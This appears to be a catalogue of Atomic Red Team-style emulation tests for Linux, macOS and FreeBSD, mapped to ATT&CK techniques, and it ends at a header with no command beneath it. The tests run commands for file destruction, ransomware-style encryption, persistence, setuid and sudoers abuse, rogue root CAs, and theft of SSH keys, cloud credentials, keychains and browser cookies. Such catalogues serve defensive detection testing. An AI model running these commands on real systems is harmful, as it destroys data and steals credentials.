T1222.002 sh linux, macos chown - Change file or folder mode ownership only
Linux and Mac Permissions
Changes a file or folder's ownership only using chown.
chown #{owner} #{file_or_folder}
T1222.002 sh macos, linux chattr - Remove immutable file attribute
Linux and Mac Permissions
Remove's a file's immutable attribute using chattr. This technique was used by the threat actor Rocke during the compromise of Linux web servers.
chattr -i #{file_to_modify}
T1222.002 sh linux chflags - Remove immutable file attribute
Linux and Mac Permissions
Remove's a file's immutable attribute using chflags. This technique was used by the threat actor Rocke during the compromise of Linux web servers.
touch #{file_to_modify}
chflags simmutable #{file_to_modify}
chflags nosimmutable #{file_to_modify}
T1222.002 sh macos, linux Chmod through c script
Linux and Mac Permissions
chmods a file using a c script
#{compiled_file} /tmp/ T1222002
T1222.002 sh linux Chmod through c script (freebsd)
Linux and Mac Permissions
chmods a file using a c script
#{compiled_file} /tmp/ T1222002
T1222.002 sh elevated macos, linux Chown through c script
Linux and Mac Permissions
chowns a file to root using a c script
sudo #{compiled_file} #{source_file}
T1222.002 sh elevated linux Chown through c script (freebsd)
Linux and Mac Permissions
chowns a file to root using a c script
#{compiled_file} #{source_file}
T1485 sh linux, macos FreeBSD/macOS/Linux - Overwrite file with DD
Data Destruction
Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C.
dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes
T1485 sh iaas:gcp GCP - Delete Bucket
Data Destruction
This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team. Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations. This atomic will create a bucket then delete the bucket. Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
gcloud config set project #{project_id}
gcloud storage buckets delete gs://#{bucket_name}
T1486 sh linux Encrypt files using gpg (FreeBSD/Linux)
Data Encrypted for Impact
Uses gpg to encrypt a file
echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}
T1486 sh linux Encrypt files using 7z (FreeBSD/Linux)
Data Encrypted for Impact
Uses 7z to encrypt a file
$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}
T1486 sh linux Encrypt files using ccrypt (FreeBSD/Linux)
Data Encrypted for Impact
Attempts to encrypt data on target systems as root to simulate an interruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory.
which_ccencrypt=`which ccencrypt`
cp #{root_input_file_path} #{cped_file_path};
$which_ccencrypt -T -K #{pwd_for_encrypted_file} #{cped_file_path}
T1486 sh linux Encrypt files using openssl (FreeBSD/Linux)
Data Encrypted for Impact
Uses openssl to encrypt a file
which_openssl=`which openssl`
$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}
T1486 sh macos Encrypt files using 7z utility - macOS
Data Encrypted for Impact
This test encrypts the file(s) using the 7z utility
7z a -p #{file_password} -mhe=on #{encrypted_file_name} #{input_file_path}
T1486 sh macos Encrypt files using openssl utility - macOS
Data Encrypted for Impact
This test encrypts the file(s) using the openssl utility
openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name}
T1489 sh elevated linux Linux - Stop service using systemctl
Service Stop
Stops a specified service using the systemctl command. Upon execution, if the specified service was running, it will change to a state of inactive and it can be restarted by running the cleanup command. You can list all available services with following command: "systemctl list-units --type=service"
sudo systemctl stop #{service_name}
T1489 sh elevated linux Linux - Stop service by killing process using killall
Service Stop
Stops a specified service by sending a SIGTERM signal to the linked process using the killall command. Upon execution, if the service's main process was running, it will be terminated. If the service was not running, no process will be found to kill and it can be restarted by running the cleanup command. You can list all available services with following command: "systemctl list-units --type=service"
sudo killall -SIGTERM #{process_name}
T1489 sh elevated linux Linux - Stop service by killing process using kill
Service Stop
Stops a specified service by sending a SIGTERM signal to the linked process using the kill command. Upon execution, if the service's main process was running, it will be terminated. If the service was not running, no process will be found to kill and it can be restarted by running the cleanup command. You can list all available services with following command: "systemctl list-units --type=service"
sudo kill -SIGTERM $(pgrep #{process_name})
T1489 sh elevated linux Linux - Stop service by killing process using pkill
Service Stop
Stops a specified service by sending a SIGTERM signal to the linked process using pkill. This method is effective when multiple instances of the process may be running. Upon execution, if any instances of the process were running, they will be terminated. If no instances were running, pkill will not find any processes to kill. Stopped service can be restarted by running the cleanup command. You can list all available services with following command: "systemctl list-units --type=service"
sudo pkill -SIGTERM #{process_pattern}
T1490 sh elevated macos Disable Time Machine
Inhibit System Recovery
Disables Time Machine which is Apple's automated backup utility software. Attackers can use this to prevent backups from occurring and hinder the victim's ability to recover from any damage.
sudo tmutil disable
T1496 sh linux, macos FreeBSD/macOS/Linux - Simulate CPU Load with Yes
Resource Hijacking
This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break.
yes > /dev/null
T1497.001 sh elevated linux Detect Virtualization Environment (Linux)
System Checks
systemd-detect-virt detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected.
if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
T1497.001 sh elevated linux Detect Virtualization Environment (FreeBSD)
System Checks
Detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected.
if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization Environment detected"; fi
T1497.001 sh macos Detect Virtualization Environment via ioreg
System Checks
ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software.
if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;
T1497.001 sh macos Detect Virtualization Environment using sysctl (hw.model)
System Checks
sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware but will return the hypervisor name (VMware7,0). Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
if [ "$(sysctl -n hw.model | grep -v 'Mac')" != "" ]; then echo 'Virtualization Environment detected'; fi;
T1497.001 sh macos Check if System Integrity Protection is enabled
System Checks
The latest versions of macOS have the System Integrity Protection feature (SIP). If a sandbox uses a non-signed kernel extension for monitoring purposes the, SIP feature must be disabled to load this kind of kernel extension. Malware may check if the SIP is enabled. Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip
if [ "$(csrutil status | grep -v 'enabled')" != "" ]; then echo 'Possible Virtualization Environment detected'; fi;
T1497.001 sh macos Detect Virtualization Environment using system_profiler
System Checks
system_profiler provides system hardware and software configuration and the Model Identifier should provide the value similar to (sysctl -n hw.model). We should be able to find whether virtualization is enabled by checking whether the Model Identifier does not contain "Mac".
if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier" | grep -v 'Mac')" != "" ]; then echo 'Virtualization Environment detected'; fi;
T1497.003 sh linux, macos Delay execution with ping
Time Based Checks
Uses the ping command to introduce a delay before executing a malicious payload.
ping -c #{ping_count} 8.8.8.8 > /dev/null
#{evil_command}
T1518 sh macos Find and Display Safari Browser Version
Software Discovery
Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
T1518.001 sh macos Security Software Discovery - ps (macOS)
Security Software Discovery
Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running.
ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'
T1518.001 sh linux Security Software Discovery - ps (Linux)
Security Software Discovery
Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running.
ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'
T1518.001 sh linux Security Software Discovery - pgrep (FreeBSD)
Security Software Discovery
Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running.
pgrep -l 'bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd'
T1529 sh elevated linux, macos Restart System via `shutdown` - FreeBSD/macOS/Linux
System Shutdown/Reboot
This test restarts a FreeBSD/macOS/Linux system.
shutdown -r #{timeout}
T1529 sh elevated linux, macos Shutdown System via `shutdown` - FreeBSD/macOS/Linux
System Shutdown/Reboot
This test shuts down a FreeBSD/macOS/Linux system using a halt.
shutdown -h #{timeout}
T1529 sh elevated linux, macos Restart System via `reboot` - FreeBSD/macOS/Linux
System Shutdown/Reboot
This test restarts a FreeBSD/macOS/Linux system via reboot.
reboot
T1529 sh elevated linux Shutdown System via `halt` - FreeBSD/Linux
System Shutdown/Reboot
This test shuts down a FreeBSD/Linux system using halt.
halt -p
T1529 sh elevated linux Reboot System via `halt` - FreeBSD
System Shutdown/Reboot
This test restarts a FreeBSD system using halt.
halt -r
T1529 sh elevated linux Shutdown System via `poweroff` - FreeBSD/Linux
System Shutdown/Reboot
This test shuts down a FreeBSD/Linux system using poweroff.
poweroff
T1529 sh elevated linux Reboot System via `poweroff` - FreeBSD
System Shutdown/Reboot
This test restarts a FreeBSD system using poweroff.
poweroff -r 3
T1530 sh iaas:aws AWS - Scan for Anonymous Access to S3
Data from Cloud Storage
Upon successful execution, this test will test for anonymous access to AWS S3 buckets and dumps all the files to a local folder.
aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name}
T1531 sh elevated macos, linux Change User Password via passwd
Account Access Removal
This test changes the user password to hinder access to the account using passwd utility.
passwd #{user_account} #enter admin password > enter new password > confirm new password
T1531 sh elevated macos Delete User via dscl utility
Account Access Removal
This test deletes the user account using the dscl utility.
dscl . -delete /Users/#{user_account} #enter admin password
T1531 sh elevated macos Delete User via sysadminctl utility
Account Access Removal
This test deletes the user account using the sysadminctl utility.
sysadminctl -deleteUser #{user_account} #enter admin password
T1539 sh macos Copy Safari BinaryCookies files using AppleScript
Steal Web Session Cookie
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
T1543.002 sh elevated linux Create SysV Service
Systemd Service
This test creates a SysV service unit file and enables it as a service.
echo '#\!/bin/sh' > #{rc_service_path}/#{rc_service_file}
echo ' ' >> #{rc_service_path}/#{rc_service_file}
echo '#' >> #{rc_service_path}/#{rc_service_file}
echo '# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}
echo '# REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}
echo '# KEYWORD: shutdown' >> #{rc_service_path}/#{rc_service_file}
echo ' ' >> #{rc_service_path}/#{rc_service_file}
echo '. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}
echo ' ' >> #{rc_service_path}/#{rc_service_file}
echo 'name="art_test"' >> #{rc_service_path}/#{rc_service_file}
echo 'rcvar=art_test_enable' >> #{rc_service_path}/#{rc_service_file}
echo 'load_rc_config ${name}' >> #{rc_service_path}/#{rc_service_file}
echo 'command="/usr/bin/touch"' >> #{rc_service_path}/#{rc_service_file}
echo 'start_cmd="art_test_start"' >> #{rc_service_path}/#{rc_service_file}
echo '' >> #{rc_service_path}/#{rc_service_file}
echo 'art_test_start()' >> #{rc_service_path}/#{rc_service_file}     
echo '{' >> #{rc_service_path}/#{rc_service_file}
echo '  ${command} /tmp/art-test.marker' >> #{rc_service_path}/#{rc_service_file}
echo '}' >> #{rc_service_path}/#{rc_service_file}
echo ' ' >> #{rc_service_path}/#{rc_service_file}     
echo 'run_rc_command "$1"' >> #{rc_service_path}/#{rc_service_file}
chmod +x #{rc_service_path}/#{rc_service_file}
service art-test enable
service art-test start
T1546.004 sh macos, linux Add command to .bash_profile
Unix Shell Configuration Modification
Adds a command to the .bash_profile file of the current user
echo '#{command_to_add}' >> ~/.bash_profile
T1546.004 sh macos, linux Add command to .bashrc
Unix Shell Configuration Modification
Adds a command to the .bashrc file of the current user
echo '#{command_to_add}' >> ~/.bashrc
T1546.004 sh linux Add command to .shrc
Unix Shell Configuration Modification
Adds a command to the .shrc file of the current user
echo '#{command_to_add}' >> ~/.shrc
T1546.004 sh elevated linux Append to the system shell profile
Unix Shell Configuration Modification
An adversary may wish to establish persistence by executing malicious commands from the systems /etc/profile every time "any" user logs in.
echo '#{text_to_append}' >> /etc/profile
T1546.004 sh linux Append commands user shell profile
Unix Shell Configuration Modification
An adversary may wish to establish persistence by executing malicious commands from the users ~/.profile every time the "user" logs in.
echo '#{text_to_append}' >> ~/.profile
T1546.004 sh elevated linux System shell profile scripts
Unix Shell Configuration Modification
An adversary may wish to establish persistence by adding commands into any of the script files in the /etc/profile.d/ directory, which are executed every time "any" user logs in.
echo '#{text_to_append}' >> /etc/profile.d/bash_completion.sh
T1546.005 sh macos, linux Trap EXIT
Trap
Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt
bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" EXIT'
T1546.005 sh linux Trap EXIT (freebsd)
Trap
Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt
bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" EXIT'
T1546.005 sh macos, linux Trap SIGINT
Trap
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt
bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" SIGINT && kill -SIGINT $$'
T1546.005 sh linux Trap SIGINT (freebsd)
Trap
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt
bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" SIGINT && kill -SIGINT $$'
T1546.014 sh elevated macos Persistance with Event Monitor - emond
Emond
Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist
sudo touch /private/var/db/emondClients/T1546.014
T1546.018 sh linux Python Startup Hook - atomic_hook.pth (Linux)
Python Startup Hooks
Executes code by creating atomic_hook.pth in the site-packages directory. This script runs automatically for every user on the system when Python starts.
TEMPDIR="/tmp/atomic_sitecust_posix"
mkdir -p "$TEMPDIR"
"#{python_exe}" -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
ls -la "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
T1546.018 sh macos Python Startup Hook - atomic_hook.pth (macOS)
Python Startup Hooks
Creates a Python startup hook using a .pth file inside a virtual environment on macOS.
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
T1546.018 sh linux, macos Python Startup Hook - usercustomize.py (Linux / MacOS)
Python Startup Hooks
Executes code via usercustomize.py. This is a per-user persistence mechanism that does not require root privileges.
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
T1547.007 sh macos Copy in loginwindow.plist for Re-Opened Applications
Re-opened Applications
Copy in new loginwindow.plist to launch Calculator.
cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
T1547.007 sh elevated macos Re-Opened Applications using LoginHook
Re-opened Applications
Mac Defaults [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
sudo defaults write com.apple.loginwindow LoginHook #{script}
T1547.007 sh macos Append to existing loginwindow for Re-Opened Applications
Re-opened Applications
Appends an entry to launch Calculator hidden loginwindow.*.plist for next login. Note that the change may not result in the added Calculator program launching on next user login. It may depend on which version of macOS you are running on.
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}
T1548.001 sh elevated macos, linux Make and modify binary from C source
Setuid and Setgid
Make, change owner, and change file attributes on a C source code file
cp #{payload} /tmp/hello.c
sudo chown root /tmp/hello.c
sudo make /tmp/hello
sudo chown root /tmp/hello
sudo chmod u+s /tmp/hello
/tmp/hello
T1548.001 sh elevated linux Make and modify binary from C source (freebsd)
Setuid and Setgid
Make, change owner, and change file attributes on a C source code file
cp #{payload} /tmp/hello.c
chown root /tmp/hello.c
make /tmp/hello
chown root /tmp/hello
chmod u+s /tmp/hello
/tmp/hello
T1548.001 sh elevated macos, linux Set a SetUID flag on file
Setuid and Setgid
This test sets the SetUID flag on a file in FreeBSD.
sudo touch #{file_to_setuid}
sudo chown root #{file_to_setuid}
sudo chmod u+xs #{file_to_setuid}
T1548.001 sh elevated linux Set a SetUID flag on file (freebsd)
Setuid and Setgid
This test sets the SetUID flag on a file in FreeBSD.
touch #{file_to_setuid}
chown root #{file_to_setuid}
chmod u+xs #{file_to_setuid}
T1548.001 sh elevated macos, linux Set a SetGID flag on file
Setuid and Setgid
This test sets the SetGID flag on a file in Linux and macOS.
sudo touch #{file_to_setuid}
sudo chown root #{file_to_setuid}
sudo chmod g+xs #{file_to_setuid}
T1548.001 sh elevated linux Set a SetGID flag on file (freebsd)
Setuid and Setgid
This test sets the SetGID flag on a file in FreeBSD.
touch #{file_to_setuid}
chown root #{file_to_setuid}
chmod g+xs #{file_to_setuid}
T1548.001 sh elevated linux Make and modify capabilities of a binary
Setuid and Setgid
Make and modify [capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) of a C source code file. The binary doesn't have to modify the UID, but the binary is given the capability to arbitrarily modify it at any time with setuid(0). Without being owned by root, the binary can set the UID to 0.
cp #{payload} /tmp/cap.c
make /tmp/cap
sudo setcap cap_setuid=ep /tmp/cap
/tmp/cap
T1548.001 sh elevated linux Provide the SetUID capability to a file
Setuid and Setgid
This test gives a file the capability to set UID without using flags.
touch #{file_to_setcap}
sudo setcap cap_setuid=ep #{file_to_setcap}
T1548.001 sh linux Do reconnaissance for files that have the setuid bit set
Setuid and Setgid
This test simulates a command that can be run to enumerate files that have the setuid bit set
find /usr/bin -perm -4000
T1548.001 sh linux Do reconnaissance for files that have the setgid bit set
Setuid and Setgid
This test simulates a command that can be run to enumerate files that have the setgid bit set
find /usr/bin -perm -2000
T1548.003 sh elevated macos, linux Sudo usage
Sudo and Sudo Caching
Common Sudo enumeration methods.
sudo -l      
sudo cat /etc/sudoers
sudo vim /etc/sudoers
T1548.003 sh elevated linux Sudo usage (freebsd)
Sudo and Sudo Caching
Common Sudo enumeration methods.
sudo -l      
sudo cat /usr/local/etc/sudoers
sudo ee /usr/local/etc/sudoers
T1548.003 sh elevated macos, linux Unlimited sudo cache timeout
Sudo and Sudo Caching
Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
T1548.003 sh elevated linux Unlimited sudo cache timeout (freebsd)
Sudo and Sudo Caching
Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
sudo visudo -c -f /usr/local/etc/sudoers
T1548.003 sh elevated macos, linux Disable tty_tickets for sudo caching
Sudo and Sudo Caching
Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
T1548.003 sh elevated linux Disable tty_tickets for sudo caching (freebsd)
Sudo and Sudo Caching
Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers"
sudo visudo -c -f /usr/local/etc/sudoers
T1552 sh linux, macos, iaas:aws AWS - Retrieve EC2 Password Data using stratus
Unsecured Credentials
This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/
export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.credential-access.ec2-get-password-data
echo "starting detonate"
./stratus detonate aws.credential-access.ec2-get-password-data --force
T1552.001 sh macos, linux Find AWS credentials
Credentials In Files
Find local AWS credentials from file, defaults to using / as the look path.
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 sh linux, macos Extract passwords with grep
Credentials In Files
Extracting credentials from files
grep -ri password #{file_path}
exit 0
T1552.001 sh macos, linux Find Azure credentials
Credentials In Files
Find local Azure credentials from file, defaults to using / as the look path.
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 sh macos, linux Find GCP credentials
Credentials In Files
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 sh macos, linux Find OCI credentials
Credentials In Files
Find local Oracle cloud credentials from file, defaults to using / as the look path.
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.003 sh linux, macos Search Through Bash History
Shell History
Search through bash history for specifice commands we want to capture
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
T1552.003 sh linux Search Through sh History
Shell History
Search through sh history for specifice commands we want to capture
cat #{sh_history_filename} | grep #{sh_history_grep_args} > #{output_file}
T1552.004 sh linux, macos Discover Private SSH Keys
Private Keys
Discover private SSH keys on a FreeBSD, macOS or Linux system.
find #{search_path} -name id_rsa 2>/dev/null >> #{output_file}
exit 0
T1552.004 sh linux Copy Private SSH Keys with CP
Private Keys
Copy private SSH keys on a Linux system to a staging folder using the cp command.
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec cp --parents {} #{output_folder} \;
exit 0
T1552.004 sh linux Copy Private SSH Keys with CP (freebsd)
Private Keys
Copy private SSH keys on a FreeBSD system to a staging folder using the cp command.
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \;
T1552.004 sh macos, linux Copy Private SSH Keys with rsync
Private Keys
Copy private SSH keys on a Linux or macOS system to a staging folder using the rsync command.
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;
exit 0
T1552.004 sh linux Copy Private SSH Keys with rsync (freebsd)
Private Keys
Copy private SSH keys on a FreeBSD system to a staging folder using the rsync command.
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;
T1552.004 sh macos, linux Copy the users GnuPG directory with rsync
Private Keys
Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the rsync command.
mkdir #{output_folder}
find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;
exit 0
T1552.004 sh linux Copy the users GnuPG directory with rsync (freebsd)
Private Keys
Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the rsync command.
mkdir #{output_folder}
find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;
T1552.007 sh linux Cat the contents of a Kubernetes service account token file
Container API
Access the Kubernetes service account access token stored within a container in a cluster.
kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token
T1553.001 sh macos Gatekeeper Bypass
Gatekeeper Bypass
Gatekeeper Bypass via command line
xattr -d com.apple.quarantine #{app_path}
T1553.004 sh elevated linux Install root CA on CentOS/RHEL
Install Root Certificate
Creates a root CA with openssl
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
cp #{cert_filename} /etc/pki/ca-trust/source/anchors/
update-ca-trust
T1553.004 sh elevated linux Install root CA on FreeBSD
Install Root Certificate
Creates a root CA with openssl
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
cp #{cert_filename} /usr/local/share/certs/
certctl rehash
T1553.004 sh elevated linux Install root CA on Debian/Ubuntu
Install Root Certificate
Creates a root CA with openssl
mv #{cert_filename} /usr/local/share/ca-certificates
sudo update-ca-certificates
T1553.004 sh elevated macos Install root CA on macOS
Install Root Certificate
Creates a root CA with openssl
sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
T1555.001 sh elevated macos Keychain Dump
Keychain
This command will dump keychain credential information from login.keychain. Source: https://www.loobins.io/binaries/security/ ### Keychain File path ~/Library/Keychains/ /Library/Keychains/ /Network/Library/Keychains/ [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
sudo security dump-keychain -d login.keychain
T1555.001 sh macos Export Certificate Item(s)
Keychain
This command finds all certificate items and sends the output to local file in pem format.
security find-certificate -a -p > #{cert_export}
T1555.001 sh macos Import Certificate Item(s) into Keychain
Keychain
This command will import a certificate pem file into a keychain.
security import #{cert_export} -k
T1555.001 sh macos Copy Keychain using cat utility
Keychain
This command will copy the keychain using the cat utility in a manner similar to Atomic Stealer.
cat ~/Library/Keychains/login.keychain-db > #{keychain_export}
T1555.003 sh macos Search macOS Safari Cookies
Credentials from Web Browsers
This test uses grep to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. Upon successful execution, MacOS shell will cd to ~/Libraries/Cookies and grep for Cookies.binarycookies.
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
T1555.003 sh elevated linux LaZagne.py - Dump Credentials from Firefox Browser
Credentials from Web Browsers
Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser, Reference https://github.com/AlessandroZ/LaZagne
python3 #{lazagne_path}/laZagne.py #{specific_module} >> #{output_file}
T1555.003 sh macos Simulating Access to Chrome Login Data - MacOS
Credentials from Web Browsers
This test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil. Once the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction. See https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ .
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
T1556.003 sh elevated linux Malicious PAM rule
Pluggable Authentication Modules
